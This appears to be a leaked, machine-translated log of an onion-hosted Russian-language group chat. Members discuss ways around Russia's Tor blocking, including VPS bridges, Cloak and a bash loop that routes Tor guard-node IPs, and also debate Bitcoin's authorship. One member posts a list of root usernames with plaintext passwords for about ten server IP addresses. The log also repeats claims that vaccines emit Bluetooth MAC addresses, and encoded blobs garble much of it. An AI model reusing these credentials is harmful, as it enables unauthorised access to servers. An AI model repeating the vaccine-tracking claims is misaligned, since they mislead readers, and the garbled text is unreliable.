aski?stevie{"$binary":"0Yd05GE6/lWShAYtohElX3jD6Hzubyac8Kgutuz4oQVGwPD7SjI9ea5IuzpZkDVc3d7RSsx3nKUubzaNld9YOpM1abL3uGkohvsztaJDc+gppCMpmklHJmskk3GRqAjax5bmJvCoiB9TgsgYRMLKgfYTurkjMQnO054aiI+m7SFb+QKmzUYg5I3kyQCjlHw2ZluSlgrAT2dl3XlPx9btsysFHIGtywYnHb6Ud7UwtuWNPlj4yQ=="}{"$binary":"zxMmALjVk/4Mn/oZmwQ0O2XRfA/mkhSji+C0m9nRK3xy5v/leopKR+A/5WKujdoXN30Uc0XpVVQQednsVOJ4tGqMxu4bxUsuew8Pc4t9TJInA6+YjXSlvFVDTMhNdqq+gUFeeoiCn8lTMTcvgdaF8qVYVQ12QiBiXYZevUfUYgoXvAAViYr+GTxSp3jQTcSFTs+aANjD50VsRUsCyZTwj0bIQH1NQ7JiaeDxPxVKsaT85aMfN8j/DYCezRp9x7Q9RMkXYdaAWaE4f5UXH24YQ6zDFGgUA424BkpA6Ud0UyNjsiRDpzQRZgVsfHlS2U1e6SGl9e6KCYSrDh3giGgKV1u+7kcVrF5jd8yuz+AH68I10VePWNlowQ1u85fX4qZJpyb7/r5MqXK05JsBmRyxNIcMZj+xk0S6ei38YqiE3E/SldI8eqvMXJdp+MIxD+gkeTkBoLHTXzNF9uEVamLWBtlB+2z/AEvwCEQ+BKiLQlt6IS84noWn0fM+7Ps8K5eKqvj/SnfDuw4GLrwJToUr+4NZNVMKPpFr+Npucaz5DGpu3aiGbhfhuCHspKUgdaAWw1/YBIBieVWuTRSKXT7yd4bHmJrgLYxgp5WbxFOXiQWEsEW3g1OXFdy+z/ZSAN7yEqMS9dRI3FBEzoh2CkXyXZrUcfRix9wWsw/n4m47srx79nJgnR/TFEKdItZRMwwkARLvzP5WTVEo4fweVXQGDNcEgV1bzR5X/01v3pLrcJztI078D8H2fVhPTDvxEaIBjuijLRhMgYf4CCK3USEC1/EUhER9KAMXPmvJ7Wm+TGiC9xiuzjfw2krbCxmtRQmc7iFTrSxIJ29hHsYvZsTiJEdpIKqgYs1kTjXo"}{"$binary":"K5a204/EICWjPyzr+2uFjSdAd8O7REkxjfECJr5rY672qZQZbjRWwyUlVc9bAQNGUpHHguJMW6gnrTB/NS+g8UzvWBwp5YHn0lAuYzRZBrtsCtNrgzhi0EcQNrU94fcaP3OkpvpAJYpkmR/qQz/mk6ox98EBlBtYOFweb8faNCIqckBkF7PcyrHFpNA6FyBl2NnFzUnsLWVWvQ5Tt0Pc6wHgNAEK+yWFYfM="}spasibo)admini alo!!!jabb podnimite pls! who's deeper in our ?)[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=9Q9Tx3LsgapWCy9TC) What does it need? the one I dumped in pastebin is a head .yml moduleHowever, in the definition of the task seems like it should be valid.I tried to put in loop or with_items -- it says, this keyword in the definition of play is not valid all there is a ruben, there all the network@demetrius I sent you a good book on the ansiblehttp://pastebin.com/s72GpLJF I've seen, now look again at the good need to make a loop, but can not do it I would someone who wrote a script, there is one and the same fragments stupidly 4 times repeated knows python) Yes, I am the same. Maybe we have someone who is deeper) I only understand in general terms - not too deep Someone I remember answered that they are only strangled / crushed))) Full disclosure comrades
who writes in python? :) whoer gives out the address of the output node, if you connect via Thorn whoer ip found out typed in the address bar is it like that should not be? http://199.249.230.163/Это test for a connection to one of the nodes To-all check with curl http://152.199.19.160 -- if it says 404 then it's ok. If you gave out a Connection refused or something like that, it means that they block me in the morning at 9-10 hours, I was also connected, but before that even yota cut off my signal a few times. here I don't know if it was because of the snow or the mobile network was falling far away) have not reached me yetAnd the site itself opens from the russian.i requested a bridge in the settings of the torus - connects with ru ip without vpn. with vpn everything is as it was - no blockingBut the torus site opens through the torus! So i think the site was blocked.yes vpn dropped out, with it normoproy vpn, you like ityou how? where does the link opens? short IP already lock from the FF (just assembled)) also - Secure Connection Failed

An error occurred during a connection to `www.torproject.org`. PR_CONNECT_RESET_ERROR I already caught the connection at the border of the region... Well, nothing, the world is developing, now at the border of the country will have to ... to download the source code, before it's too late) Or on disks from China to order Well have to travel / fly outside Russia, download there a browser ... guys, tor all goodbye, or what? `https://www.torproject.org/` - *Failure to connect to the site.* but from the tor browser itself all is normal...no problem with tor, I think they would rather block themselves than tor) by the way, Nakamoto only followed a fairly well-developed theory belonging to a specialist named Wei Dai, who published it in 1998.
I looked it up about 10 years ago, my opinion is that there is no Satoshi Nakamoto.
There is a specialist from northern Europe, I assume Sweden.
Apparently he worked for Assange's team.
Finding his location at the moment without the help of Interpol is problematic.no offense to our radioactive comrade and colleague)))) i don't know what they are chiseling there, i think many have the same cranial cavity, as in Simpson Homerbombsbs in the ass of each other drunk and work we interfere with all sorts of crap in the law can even borrow some speech patterns) to the head of the RKN should collectively write a letter in the style of the Cossacks of Zaporozhye to the Turkish Sultan of the 17th century and deal with TORP Let Franz call the RKNONI They even think about us?Well, yes, instead of a localhostA should be running Tor proxy on vrska? By the way, Cloak is able to mask under https traffic not only openvpn, but also Tor-a. So, as an option, you can raise your bridge and mask it with Cloak. For Tor, Cloak has its own pluggable transport, as I understand it, so it has to work for Tor. Just replace 127.0.0.1:9150 in browser settings with grey IP_vpski:9050 and traffic will go through tunnel IP_vpski in the sense of grey IP through tunnel or you can do without transparent proxy, just connect to IP_vpski:9050 with browser as socks-proxy. So Tor traffic will also go through VPS-coup. Without default route, with transparent proxying Tor hosts are mapped to gray network 10.192.0.0/10, and Tor also has a built-in DNS-server. Onion sites will resolve to IP from this range. Then you only need to register this net to VPN and add transparent proxying at VPN. All this can be automated on Ansible as a script to configure the psn and deploy it in a few minutes. Which I'm already doing.[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=5ouFy95g3WCSMMz4k) interface=ppp0
listip=$(grep -B2 "^s.*Guard" /var/lib/tor/cached-microdesc-consensus | grep "^r" | awk '{print $6 }')
for ip in $listip
do
    echo "Add " $ip "to route..."
    route add $ip mask 255.255.255.255 gw $interface
dopet.e, I also think it`s strange to choose nodes, every person should use his own VPN to go to internet as it was before. Why do I need routes? The default route is prescribed by VPN itself and that should be enough `https://metrics.torproject.org/` the first time I've seen this section of the Torus.
route add <address from this list> mask 255.255.255.255 gw <your vpn interface> ``
grep -B2 "^s.*Guard" cached-microdesc-consensus | grep "^r" | cut -f 6,7 -d "
```
this is also possible in git* I've seen it too, that's where all sorts of cisco filter lists come from... I'm asking you, I'm telling you
```
grep -B2 "^s.*Guard" /var/lib/tor/cached-microdesc-consensus | grep "^r" | awk '{print $6 ":" $7}'
```
```
https://tor.stackexchange.com/questions/14697/list-of-all-the-entry-nodes
``https://github.com/SecOps-Institute/Tor-IP-Аԁԁгеѕѕеѕгде is it? I don't know, but I saw a githab rep with a list of all known nodes, and a list of output nodes. It's updated like that, it's often a bash line - cat / sed / grep all sorts of thingsI had a tor working
then it got shut down
the rcn blocked everything.
no fucking way to get through.
I still have the torus cache.
how do i get login addresses from the tor cache? @ruben @benny tell me how to get a list of login nodes from the cached-microdesc-consensus fileSay i put my tor bridge on a VPS
Will it be possible to make this bridge will not be given to other users?
In this case, make a special bridge is, imho, superfluous. Through the VPN it should work without a bridge. Unless, of course, openvpn is not blocked. And if it is blocked, then you can use something like Cloak. P and B. can solve something there, cybersecurity in one of their agenda themes was like Kiselev on Sunday will tell what's what, I do not think) coincidence) If the VPS install tor bridge. I would like to add it to my tor browser. As this option, bad or not ? Simply, when you raise the VPN add the default route to this VPN, ie, all the traffic goes to the input vps-ku. And there already on the aps-ku to wrap the traffic with transparent proxying in Tor. And to use DNS-server on the PPS-server. Then all will work transparently without any additional settings in the browser.As a result, all the same zakonektil and works up to now))) today in the morning, yota for an hour and a half my connection cut off (modem) - was running tor without VPN (not working laptop), surfing on torrent-trackers stupidly. after restoring communications launch tor again mobile.I do not like this option of copying a tor browser to vps. Traffic on oneon-site can be transparently wrapped iptables-om tor on vpske, I have done so myself.It is necessary to lay the route correctly it is nonsense, no need to copy anything anywhere, Benny, I mean that just tor browser copy to VPS, and run it there. As many are now doing who have blocked torhob double, even tripleRub, well, properly, the tor within the VPN...And that DNS-traffic went to VPN.Ryan, I do not understand what you mean...Why the dedic? Just use Tor on top of double VPN as we do it. In case they start to block oppenvpn, mask the traffic of oppenvpn under https with the https://github.com/cbeuw/Cloak thing, and at the same time install there (on the entry node) Tor and caching DNS-server (just in case the DNS-replies will be switched). All this should be implemented as a script on ansible. In the browser to prescribe Tor, running on the VPS, in the form of socks-proxy.Provided that the dedicates, and not vpsluxFellows, and there is a solution to encrypt the drive on the VPS so that the hoster never opened it?
Is it? the first round of encryption happens on your machineSilver, I do not know, maybe easier to make a grid of their own private breechesVPS option is simple, but there is a serious drawback. The server side can see what I'm doing in tor browser, all passwords are lit, etc.is this a solution? @ruben @benny what do you think? then both on linux and on the wind will be possible to cling to any VPN of choice, and use it as a bridge. ie dull set
```
route add <tornodeN> mask 255.255.255.255 ppp0
...
` ` I need a script that will shut down access to all the nodes through a torus so-and-so addressThe easiest solution - each takes a VPN (7bakov) in Europe - there raises VPN - and through this VPN goes toromredlozhayut that need to dablvpnRub busy script Hello All
Has anyone come up with a temporary simple solution to the problem with blocking torus ?
Like take the cheapest dedic and put a Tor Browser there, and so go to the torus? Or something like that.
Man, if I now tell you everything) there will be a whole poem) guy just came to pull the wool over everyone's ears, to scoop the dough and left) such as the architect who came, while he had the entire development department just stood for 3 months and in the end he got fired) and then there were a lot of slow moments it should be updated or in 2 if I am not mistaken, from scratch to the off-line launch seemed to have gone in 2.5 years old I want to say rabbi were not very qualified those who worked in the last office in the city N were cut) before the launch, I have not lived, because they all moved to Moscow and rented a cool office and picked up the development team Tammy when I worked in the startup cryptocurrency "credits.i used to work for cryptocurrency startup "credits. com" We built the alpha version in 3 months which helped me save 24k efir in ico and i would buy all the stuffing from scratch - no offense )they say bittorrent with all the knowledge accumulated over 10 years )but if i let our team write my own bitcoin clone, i would buy 3 experienced coders for 6 months ) but the world knows how long this project was nurtured and tested before its first launch?@homer all the solutions were already built into the original project
yes, it was polished but there was nothing drastic
there were even already proto-smartcontractsmechanisms of rollback blocks when the loser chain is rolled backNow the bit code is supported by more than one programmer, i think if you find the code of the first version (at startup) you may well understand it So just download the bitcoin code and try to understand it), and then we'll come back to the question that it was done by a single programmer )with a lot of non-standard data structures, an excellent designer to design essentially distributed non-classical DBMS, he should also be an expert in building peer-to-peer networks, an excellent c++ programmer further on, let's say there is such a guy, for some reason unemployed
what is the chance that he will invest years of effort in such a magnum opus? and where do cryptanalysts live) in what sectors of the economy, so to speak ) this question: is it possible to hire a cryptography expert in the job market? to know at least the structure of the otr, not to mention
Not to mention attacks on random number generators, cracking ciphers, etc.
? i do not believe that this is the cia, in this area must be a real genius, or some university.or a friendly team of many experienced engineers led by mathematicians and cryptographers to design such a system, debug - a single person can certainly be, but it is a genius genius genius if the bit was written by one person, he is a genius
There's a hell of a lot of developments and ideas, and he's already dead, by the way, a lot of legends)) Satoshi is someone like Nick Szabo, too little information about him is known, although he's a profesor, giving lectures at some university, even his birth date is hidden. 95% that it's himhttp://www.securitylab.ru/news/527291.рһра who heard about bitmessage? the size of UPSA boxes the size of skyscrapers?)) Someone has yes, someone does not.So they have boxes already standSilently press the OPCOs, implement. I mean, not in terms of storing metadata but in terms of storing traffic itselfDak for a long time nowAnybody knows, is Yarovaya's project being implemented? And in general, go to work at the factory) in the staff)> requested)) to remove the link to tor-browser.exe from the site
Yeah...but what about i2p?) these are sad times) I already read that yesterday the RKN wrote a letter to tor and asked)) to remove the link to tor-browser.exe from the site, it will be a backup link, and we will continue to work there. torrent works as a peer-to-peer network and allows you to find out the address of the interlocutor, you need proxying for anonymization the first thing to include in it proxying through socks5dobavlit me in it - start a tox for every tricky >|< ass found >< yuy with a hard drive) for example, here with one chelovem communicated, i got torah with a VPN, he got torah without it but the rkn is already making statements there3) security of the torah is highly questionable2) water will find a hole1) there is also the idea that it was not us who blocked it What do you think about blocking Torah in RU?) Where to run or will be like a cart) They say breeches bypass блокировку)eyJhbGciOiJB4tEhid/DqbvCQEe6QDw9JsVTEAZ2bwEAf5yWtGbfszAxa8a3HPBc+Q4DkaNHUsM1QuddocSEwEoKHcPTlFjzH/81Kyi1Eyl+fezR6+8algPn5AnquHNqcw7Gp6qibfMbcQuZML2KFZKwytRAFjvilt0aXlG4kh5z1x8kZkhXk1s=eyJhbGciOiJBsoxRPTYyfpPDD4iuYj969h5q0Oly4P/0myHk5SoO4hVLSd3NjFk+rtYWkei7bS9zqq/I0BwJCMFL4tD9BeV4CuYEGObYAFNYsAf/oqcepl91E94qdzJbsPnmsH0BAuYIUErMqzJ1tvt9WEMpWI8dIWF2DKkW3kXRTjPgAddUc2dL9SM8I7uPOY+ujUiaNzFreyJhbGciOiJBCSxRcs/0ZwDPPr8mOXwBEgf2NiqJ5CqcmGJZVx+rEtXHeFf3Xva4NSCTu4PXyMgE2zuZ1mXfsoMfijBuNyGQOzjk+MAMLGO0W+bFntu5WD5qx6KZ6zM/8DFOtrFXT9arUdsqbu0Luyd3wep5EQc0xlVP/W5Mb202kLvdpuAU218=eyJhbGciOiJBIFqW0z3BVY+LQkiPjOmC4ubhhueV+O4NstyD97fXbf0JuL0PEM1bwcuf+6XbUkM+TZSJXm6t6RFuV5n96nhakgAXWxB47ThBsuD/BJhYFCGOSxvm500hTiHYzwJ76DMX7mw8PasmW0wC2JljhSSu1lEpkNCFyozm2oY+P5s8eX+I1E7dw5dfrOYFpyX6qOsJeQyX36KKO3z91YTTl26t2VkRMF/oDDEQ5TNyJn7yXb8=eyJhbGciOiJBkIqouDj1HF95G2BTPuf+8vCYnQLh7xqgphNX5zsU5FrBtxZGpmY5idcXo2GRvm47o2PD+yljRiYfqX/LmL/gNtyjjKBfqJpke1MIJq71rsTCxct3MdjxTH1RpxRdiKiyhEJh3fJM5edAQB+uNtO1KtzsOlU9uKQwi4Qkd7frsmg
https://alphazine.ru/showthread.php?t=2789
```
@all in the theme bechdor revilne, I turned on the phone to turn off the alarm (so fucked up and I forgot to turn it off) and turned off the bluetooth - battery lasts longer nova fun aha, now we will catch pokemon :) By the way, thanks for reminding about the bluetooth, at least turned on the phone and turned off the clock night boudoir) @ruben `https://youtube/kJfe0TMHjDc `FouguetFamily name is strange, he is also gay? :laughing: all go to the village to this grandma from the video!!!weldon decided so call the technology Web 3.0 -- decentralized internet of the futureAhhez, from what movie is this taken. Terminator, you say? skyNet??? astala vista baby???? )```
https://lenta.ru/news/2021/09/08/fage/
``````
https://vc.ru/future/26886-personal-biohacking
``see, you can watch directly from the internet as streaming posted this video on skynet: https://siasky.net/AABU9_47P83azwu2N8spRA8w7r1vKwVMrdZnfjZM5qHiogsilver normal rfid chips (which are under the skin) are pretty big. And these are tenths of a millimeter or less. Plus the rfid is powered by electromagnetic induction, and here by microwaves or body heat. Technology doesn't stand still. I'm kidding. You're talking about seriousness.
>Patented technology from IBM.
I do not need to explain what this means, but if we are closer to reality, something like an rfid tag can be put into an injectionPowered either by microwaves (they say that 5g has the optimal wavelength for this), or by body heat.Nanopunk? )And wireless microcomputers are already a reality. Go and read about "smart dust" which is a technology patented by IBM. They created a complete computer in the shape of a 0.1 mm piece of dust. I am not there, I'm not vaccinated there :grin:on modern consoles there is no 60 fps depends on the performance of the console I gave you an example of something which is impossible You are saying that nothing is impossible and what about toys? honestly, i don't get the humor--i'm not a gamer i'm not a console gamer about consoles like PS 5@ruben it was a joke not for everyone) there's a video, on telegram on what consoles? >nothing's impossible
why is there no 60 fps on consoles then? i haven't run a bluetooth device search for a long time, but i have to check it. nothing is impossible, if there are nanochipsGraffiti nanocomputer ))are there really IT specialists and engineers here? are you serious?) loooooool what does it say? "A vaccine with a digital footprint," as Health Minister Murashko put it.Vaccinated can be seen by bluetooth as a MAC address: https://t.me/c/1558684436/19075 (who has telegram).If there is no water in the tap...taki goo hackers (tm) like no longer relevant? )))) it was not them all? )southern region :)but our grass is green, butterflies are flying so what do you say )oh my god!
https://www.zerohedge.com/news/2021-09-24/financial-disclosures-reveal-white-house-press-secretary-jen-psaki-was-employed
White flies have arrived - Winter is coming :woman_zombie:Ural, I walked on the yellow/green grass 3 hours ago, and now I got up from the PC to pour coffee - all white)Central region?
all have a good morning and productive daySay Monday!) rocking this world?))okay, thank you)hi, works+good morning and productive week to all :) jabber works?)eyJhbGciOiJBff97v/DJdeOzJoXSMFUXzVjvBwtuXekA5vOhjj1MLhaZvqDjn8OXyrJDvxwh0x36BgoP7qZbuBs8PdFBsND+lp6iLHXUOs/57tncsLeSXPLFmE9fCl2qt8YcJhQFOmdj3GGNa/QgFn16CWRwFhW5BZ7qrxI5y124uBm2NNtlwJuhNVolnWIYI13vTWRAkRHA1lmpUVP6Jl9NR9lJSGmxAw==eyJhbGciOiJBwdM38vzQVmpI2cbSvROvnItv1kH6WyS8U3Gaken5/LxSywk67ONsE6vrRvko64uubmxmU0QscwzOAJfokTtXDHdDVqvJmmDeTDdx2MMerpkDJrUSianKmS3QQJxVzq134vP3Enb9DUmhOCD67R3HUqGerewRL33qlYVODz5RsfkN/kRm3dl0TgPLpMmwhzQqyWlGV8h92kf7x9bKX5MAC1pesFu090SQV+pa3HvqXtphJnHokj/UPpxROnJM7nXSBnoGmPoack2IhUBAEffrG8/q62nVJM4ulbX324yJFrUGEjHOUEg1TpeYiwcCb3wg5VShztNeWFcUJYO3S8y7R+cAXAEShJLFvzyMA9IDYow=eyJhbGciOiJBHpJ3xv/ZV/vGBIqNtRQnzAsxrEeAqmFe6PxfJ5nnB5Ym60THUT1+45j2L+AnxrbqEkUYbmETJM38V1d+yDfd7qbi2xyuzQVZFfzvzotv20kXLGTAgrtKqozETBJWsp4qXuklkPWq5JpZa9uozjET1YF+T6y4PYXbtsAdOhoNPRQAX3Rd2TEfMx34tOxKx8vdeyJhbGciOiJB4eYx7t/kbYtkWgpgaBCKbBqmr+lJI4cc1691nZ0jjfcPJToISMvN3R/zXm66zv2A5e70SbqDKFvzkVBJX1s15XpO+SHR+TDmIRJIgOGXWrPH0FWCcqS/jNOZyqHstyhNc1ie6/Kj3uSHtEvTb+pG6B7RQUg7jbg25FDVfXYmBUUc1iuAkI2mXBwTR/48wN9surzEa468Y6G here?If you have in the personal. kosh damevsem dobooe morning, guys are there who can knock off $ 500? I need it urgently, right very much. I will give 550.nevilleeyJhbGciOiJBFmdlodKFpJnl4qRa2hF9b9fT3dtBFcmODV1vISFXD0wIPzGXB6TQtRxEWBUjRUU3rEAiQN5oX0sluw+D7Gs6Xu4n78TUYBYJ2xBGR87QjiYzLKlGlsZ2iA5wugY2HtoW2b0NMWu8ixPmsEIRmEPbda5VNTAotP538o4rtc0r0M9sH5ePmYmBFB9bjOA7joqjeyJhbGciOiJBd3mRgtnzeWMEwcP/zzl/L5oGYco7IbNwoejNF+y24uBgguHACUKwzgoX+atwXZiIAtpHLyreoUPLSXj2kNxjvTvTcGt1A5Pr6BjP6lgh06jUh7xdIjdbeHIVywb1nhSfBfvHNRPEQmvLMKx3niU+Kj+QOjvZlv303bKA3WUcpCJk8VFc9mcPx1fP8DSiq5Srsc2eN2IW65fN8Q4uK5ycWgmKJpw2TkU+U5KJquKGORiYKK/D67ARK86HD0/CfwmWzvQ/yq2oG94IXM973BtVSZdJxhumWnJ3Qf2VVHnuiCVDP182yPLbYtSU7W91tPptpz2JHV8XOXew9fftFd0qAWh8GrjVnAPWfjTi7OHEAtruaNtBU+ypOu6bDBFrf3nbOy3ch087pVLukngmCu45GIPdoVLmNAxmp44HfBF7EBpXoGmqdWifL5KhekyPMNvnW6DptJ9BBjBoFwdeP7BHG7qM5WiTDHbzzMRoaLXnZKlMzTr/QGP5lHEmsIsXQ9YmS+c5iN5JU/gx4V9u49l7+jtPXoOf4//zQlZB6ouazPPsoenyzTtGCclmRXtBEpukZS5JVTGI5kMIkqpRLfwu8sgGnYpms2WMhM6MuStQEjY=eyJhbGciOiJBclYNiCMlU7bnWld6EiczS7CcfR+aMfSHsZ+ycLPgg+NWw73Ee5rgheoLZGC6kedMTtNE5yapMXKaYuLXbx1orTEL+Jaj/DGLf4/96ayBxPGWVR6beFCW4Tf1pXAYi6cP7bvK+mOaAO8KflzKXWlW+Ct8cUl8aRaHhgZZJUBi1 At least you'll have money to eat. Get a wife and you won't need buttons, now it's keyboards, tomorrow it's spontaneous crap, we're past it.. you do not understand.... (c) for suckers in short it seems from the category of gold-plated wires for 20K for headphones for 50K because there's a cool sound, and you do not understand this "trend" from the series of pathos, like, well, this is an instrument, I'm beating the cabbage with it ...The main thing is that you have to be careful when you think about it... You don't understand this... It's so confusing, a person you don't know dies, but after a series of events, you will still feel like shit and you will pay for it... I understand it and I even accept it... I don't remember the name, I think it was called "The Button" - the movie where they give you a box with a button on it.., If you press it, you get a million dollars, but the person dies at the same time (sorry) I do not need it)) is, but when you press it, your money flows away no, but there is a button - masturbate on my keyboard even for 1ka button "money" there is no special?there's a whole cult out there where they change the buttons, they buy a stupid keypad for 100 bucks and then customize it. maybe they missed something, but what's the new fashion for wanking on keyboards?Well...the bridges rock, it's scary :smiley:Yes, the wind is getting stronger))) the torus is storming maybe I have something wrong with it without problemsneajaba is workingda, by the way, Caesar is planning to come back, do you know when?everything according to plan, like letovai teethe like angelo) hiva like tsoi ! I have dohlada, did not die today + + Jaba works for all? Thank you! Both of you! `fakegenerator.net `There is always changing the domain, it seems what we need ... 10minutemail will not be useful? Please use a work email address. Free email providers are not accepted.It is necessary to register at the service and only takes corp ...Hi! where can I register corp mail can? oh, the booze and the bike in general go side by side (you do not fill up the bike and yourself simultaneously cheaper to drinkdvuhspodeski from 115 cuntnadetsnado upgrade the bike, and nowadays it is not easy. Entry level from 40k and you don't know which one's better in the uppers, it's a ktm. these mtbnorms are italian. кроссачиeyJhbGciOiJBsJ1hx1exvy/LjFhqQ9/SaJnNdUN/UaGG5iQF1bUSUga4JSTTVuIp+2MVOQgr4+ajkh8b78XVgn/eoWc8wIWH6ePeUCeuEI+MTmUeDF2AkfY2znpPWrEHV2y+sl6AlPQAChy+YDUMQPVTwkttHFiWtQ4IB84BOcTS+cIcJI1fBfNl+ieYrp+B3aYHAd5c2reeeyJhbGciOiJBAQJMZdH0ePM4xQvWaX6414KO7d9QC8gtIOWXYGi/nRVUdbmhjZDHGOCQHV+srII+/9cAqV8LvW9LbLoLqoIV/qySbkeK74l/j9LujivuZHVrW5XnL8wZQFqHDEz9e7g6EzDWT1+5Inl1uN4VrRhMRxmU1K2SIIr7Y9TbzPYhUfEeRFWR6/GuJyElABJRjiGocl8cuqyj3rjdcimUllTurIJgXgzPCCTBrrpVz4srLnPpRNmF019WMnTdWJg+MNoiFpao8I/Ob1i7sSuheOwHnTJxNhjVBL6ynER1CDcsGPvCzlYHB04J0sMDfnotjQLu1uzpjTBYuQNaJlctFK2quMwInStFTFERTMukB5/ftvnYdwyL1x/0yFARwvSm677g6qE6ZIutoND0lfH+jsMhYtYW4SFLDIGvZa2KNYp5+dQ7+JANWpKOyQ/akCsrqM5JgUE7ds708YBvrPePIGWnzA92KIEhhJQiAGKtQHfTj6JU6tYAmRo+TyjrFW9Bb98lM6XdAS9fnwEs/XljUBShV3ZQql1rOSFkkvC0JhDugRnWA30JAnHtKWPV6Buh8envd5vkFngAfyf+w1+3bP91qCBpzYCz78kZQESZyv0BQqtTQI+fX4iUbtuLZv1LybPH7djPshh2hfA0Ieq1RiZWwyR4Yybs0Bz8vUv7HMJLofwm4dA+Eq3IMzOBpzR4ninCsfV9ChuUN+CIAKnCGMTnpA==eyJhbGciOiJBWxksQLYKMXr8rM95emwglRYt1M4q8pGZzNYDRweIrlMqayBpKZ4R sspr hello!root 94.140.115.3 4g6iW3COrcpIiKg
root 45.15.131.126 123qweASDzxc
root 5.181.80.108 123qweASDzxc
root 103.208.86.239 g)lsYDU8lC220.
root 23.254.217.230 Ssva5yWkdSKd6Rq4
root 185.183.96.36 123qweASDzxc
root 45.41.204.150 JZdVcEhBsrwG
root 148.163.42.203 y8rxg7iQ6Ym49Ln
root 193.169.86.84 65QVdQDz
root 185.163.45.132 ua@y$i9ouTh9vot 10 впсприветeyJhbGciOiJBiqbm8vglO9qAd49fV/9dFvRgm3ZFyd8qy47worXbS+wwUjvvFTJA2/QOmcjEf+SoUSWqYChnjHFMwTxhtgW9HxS3xj/Bo9W4InEJ7PyLJxW1eYB+kHyxX5VCnfSu3tgwtkR+zuu6kzdCWZfsK+lwN+vMgw7ID1VP8AACGsC+CI4=eyJhbGciOiJBZQxjSnnAJa4e9IZqREpOW2C4x+XZdV9ZGV6Mjh56HLrXgWRYW6fTQQnfyrgjzrPZ2tqKv5niX+eKOt2xNjvdL5Cvg4iXSgjJz4Icho/8b68gjkO3TGK3z8ZuF7C/g0UlFNAqVn0t2lAfVnIwqi+B0GeGbI4VnnBxsSSOiZ/Re7KvvsVLOEHiASfIFKVq7NnAtj6A9PHajo8s7G5k0RDowg==eyJhbGciOiJBnpmrUIb5b2eCO2O6bVZDmVP2WNr26w3/TtmHCw6XIArCdjeiFXF5mHlXObRaewvrn6vcU8KvT98PoLVIooZADiZCbUQc7EOAb+sY1fMjjy2eGS9VblFDcHmZ3PK4VVWBDmoVdA6m4iZn3T1BtZV2bmfEa3RkMjuiCRoNnhLNPu0HYcfSJ3LdV4JNZ7WiYBgFcziknb4gTN+HeGBRp3d5EGS1qSpljq9syNlKlm5Jgm18uThlzLi2BV7N+UQ9YAVVeyJhbGciOiJBLM6BTlwuqKk0fiTEI8XDMUtBruRlZ12aqkCHtuNrfsmIvIgJDmSXWhV4FOlKfe382x75ww20e6KvhTDa4INXneDP+IiQ5JOOdOyTsSZJtP/7s4orvelkKYABsiSpqB2L4XIYA6FslsdUEI4bFOyWpoDUBNlEq7Tndna/tsIyk8etHwVIFq0WiCGl3hsAZeYpeyJhbGciOiJByydEt38RULpZ8LOYyzG7rHKfvJNnGC1FUQ429mVihsdti58nhYtnCDa0iRGNydFbIUiHCMnpCg7Ez1gcANaegZVrxHIZAj4apO3U75IWq+KSOZ//pastie.io/vxuaco.gcode unsubscribelongkongpongpongpongpostpostpostpostpostpostpostpostpostpostpostpostpostpostpostpostpost. there is a question about assembling one shit@all and there are go specialists?it's ok){"$binary":"a9V873r9PicRwon9fokXhnadi7MxlhimXAzJlHrwqVBIEZRODHf70u1H6P86zHDtNN0McTZjgzD5/U2T4Twvy1kbhTQ2yZBJmZ6hTFS5hXY0abTTJSMgtIE6K7SaUSEpGuSV8SJNBTbCntI7Z7RRqwPxcFF4XeS2S+gfQzfiV1ODLHSAlgS/C+guByphBcc8dMBEKbkBcp0b8W7JoW5fCh2eJ/QWntw8OYaboRYo6rf3PEO6AT92PIEHEQ=="}{"$binary":"lBSDJXfbwRQU84JP026NCqXui/UR6Xg5xMlllWdSp0J4bE4qcB5ZMq+Pk2IQK5GB2d10QNCSFHqjlOK4evd/NpIsNPmSYLuPPthkTwqf+PkM3/sZO33a9TGj1t/cNAQfGDwxAyv+S/mf3pxJBwPT5KthkObSV1RbWws4oqggxY6PufNjxAYb8Btu3C0VNOkUzht+9+gZqmsVk9YQns1ppfIwYrDQ+FLKGi2xxp6uWFO3qtgArvx46x1MnY63OkQBp+92x7LwSbQL7cPmFDuOGZA="}{"$binary":"lUujHgq2Uw3wUtanaQU5Z+PNN+wwgIPV6hkkEOHPZmLD3/Tdn5lPUdO1l4Uf1+Z8B5E+PAdO5L2CrMiV1On9pjVXKwS3iEJ6JpAQVJo1u+GmlVr58tr6ZMVETcc8W3XOnKGrl8Yj9xaIXdlSbYjVeJbNmaZpBfB+ELnHfClvN3FCw6XDXO+jNzjReX8+idFaUFhVb4vUHcNe2lWfNOepLVBLyMOZrmWEybgW6iCLumZl4gq7CjtkMm19illdCve04Q=="}{"$binary":"76SI+4+sHr0EvyrlR2MJQj5pAQjpq97W7PISRIbUnfLdjnD9HNMnDuRSpexa89fJ/KAuWMUvZ9HfzBHdtTRPkY+7ctW4QnMKt841VpulVKb3NIUmRYSxUEGQ8EjOh8wfbbUA4gCajyvLavsr2PRljnqnLVtsX7CHWmAS9/+9PTj3dDxMgQbaXyyqS48PDaAIVjLfBaLx9CVogAPkh9PTnYi1XS+7Bbfl8mDlwGlP7ucWB1LegZlpQem1APOZ/dZAS8dsNOZW0Mu1z661f2xJruOyLKmhp8k6hg=="}{"$binary":"138/ArwnNDoGU2iNpTYtkwVa7m5WxG6IuSkeBn3rvEYUVSzOTmSKGm6M7aWDeRnJ5KBEibxglx18YLxqNL3lS2J43IB4MbGOYRFyQiys6ubSOCQq/4nUA/Wc9FajCWxqlpxYL6exs1fiqiml/XKxV9b3eclqyK5dVStXyTu6fNwbb1CNa3lFXqDxvc+ntDcJFidosfwyVcWOGRMhisZPevFek1d2q4P82MW4DypTgyuhkFa0RKpZTwa2lmfSwxBh+Q=="}{"$binary":"QVpVgG9ynn8wMEbyf/C0+Uvddx4hitW3OVJiGyNHMobVH/atHEVyP5aLuTWw1DoSqXk/cscA3iugoCgOGGlD8agSbApjOHxCxDXvirvyIQVcm1mqJ/zML7tZeCjWXq4x+Un7m2zxblmA/uHyEKWOsxIDHQ0veExaVXmueu4fw6q628vmuVk+NNQPOfME7fOCPXHFcoTWcY6B8z9EvwJQGIIzrvns+q45EtyuxeG4QNahuzCj5i3d5nUqL/agb9/QKhTvrmkdHB+mdC1jANUke/+YlOkDWe4="}{"$binary":"DvCYVdT/wOksog0bF+/HRzEHIvazcDXjegnm6tP5/JElpDA09cc553EOidR64SskWsZ68yNLrgLdL0cLcLhG9I6MAqIZiETtQr3/skzMq/y/OwIAe